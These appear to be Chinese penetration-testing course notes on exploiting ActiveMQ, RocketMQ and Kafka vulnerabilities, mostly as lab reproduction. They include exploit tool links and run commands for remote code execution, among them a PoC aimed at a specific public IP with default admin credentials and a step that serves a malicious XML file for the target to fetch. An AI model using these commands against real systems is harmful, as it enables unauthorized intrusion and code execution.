知识点:
服务攻防-处理平台-消息队列&ActiveMQ&RocketMQ&Kafka
消息队列:(Message Queue)
基于异步通信模式的中间件技术,核心功能是在不同的应用程序、服务或组件之间传递消息(数据),起到缓冲、解耦、削峰等作用。发送方(生产者)将消息放入队列后即可返回,无需等待接收方(消费者)立即处理;接收方则从队列中按需获取消息并处理,实现了发送方和接收方的异步解耦。
常见的消息队列产品包括:(广泛应用于分布式系统、微服务架构中)Apache Kafka、RabbitMQ、ActiveMQ、RocketMQ等
演示案例-服务攻防-处理平台-消息队列&ActiveMQ&RocketMQ&Kafka
一、ActiveMQ
端口 条件8161web 需配置访问61616tcp 远程访问 开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。CVE-2022-41678
影响版本:5.16.5, 5.17.3版本及以前
参考文章:https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2022-41678/README.zh-cn.md
python poc.py-uadmin-padmin http://101.32.220.14:8161/CVE-2023-46604
影响版本:5.18.2版本及以前
参考文章:https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2023-46604/README.zh-cn.md
python3-mhttp.server8888python3 poc.py 目标IP 目标端口 http://IP:8888/poc.xml二、RocketMQ
端口号 用途说明9876NameServer通信端口用于客户端路由请求和Broker注册发现10911Broker主监听端口处理消息发送/消费等核心服务 Apache RocketMQ是一个分布式消息平台文章复现参考:
https://mp.weixin.qq.com/s/UsjzX-HSt7QE1QeVBdEXaw
https://mp.weixin.qq.com/s/ceZY_TJqsaWyyHubrlKqSw
环境搭建:dockerpull apache/rocketmq:4.9.1dockerpull apacherocketmq/rocketmq-console:2.0.0dockerrun-d-p9876:9876-v/data/namesrv/logs:/root/logs-v/data/namesrv/store:/root/store--namermqnamesrv-e"MAX_POSSIBLE_HEAP=100000000"apache/rocketmq:4.9.1shmqnamesrv#1.创建broker文件目录mkdir-p/NDTSec/rocketmq/conf/#2.创建broker.conf文件vim/NDTSec/rocketmq/conf/broker.conf#3.将下面内容复制粘贴到broker.conf配置文件中:brokerClusterName=DefaultCluster brokerName=broker-a brokerId=0deleteWhen=04 fileReservedTime=48brokerRole=ASYNC_MASTER flushDiskType=SYNC_FLUSH#4.启动brokerdockerrun-d-p10911:10911-p10909:10909-v/data/broker/logs:/root/logs-v/data/broker/store:/root/store-v/NDTSec/rocketmq/conf/broker.conf:/opt/rocketmq/conf/broker.conf--namermqbroker--linkrmqnamesrv:namesrv-e"NAMESRV_ADDR=namesrv:9876"-e"MAX_POSSIBLE_HEAP=200000000"apache/rocketmq:4.9.1shmqbroker-c/opt/rocketmq/conf/broker.conf5、启动consoledockerrun-d--namermqconsole-p8899:8080--linkrmqnamesrv:namesrv-e"JAVA_OPTS=-Drocketmq.namesrv.addr=192.168.88.104:9876 -Dcom.rocketmq.sendMessageWithVIPChannel=false"-tapacherocketmq/rocketmq-console:2.0.0CVE-2023-33246
文章参考:https://github.com/vulhub/vulhub/blob/master/rocketmq/CVE-2023-33246/README.zh-cn.md
项目工具:https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT
d:\Python3.8\python.exe check.py--ipip--port9876
项目工具:https://github.com/vulhub/rocketmq-attack
java-jarrocketmq-attack-1.1-SNAPSHOT.jar AttackBroker--targetip:port--cmd"xxxx"CVE-2023-37582
项目工具:https://github.com/Malayke/CVE-2023-37582_EXPLOIT
python.exe CVE-2023-37582.py-ipip-p9876项目工具:https://github.com/vulhub/rocketmq-attack
java-jarrocketmq-attack-1.1-SNAPSHOT.jar AttackNamesrv--target127.0.0.1:9876--file/tmp/test.txt--data"Hello World"三、Kafka
分布式流处理平台,用于高吞吐量实时数据传输存储和处理, 广泛应用于日志收集、消息队列、数据管道、实时分析等场景。 默认端口:9092CVE-2023-25194
漏洞影响版本:2.3.0 <= Apache Kafka <= 3.3.2
复现地址:https://github.com/vulhub/vulhub/blob/master/kafka/CVE-2023-25194/README.zh-cn.md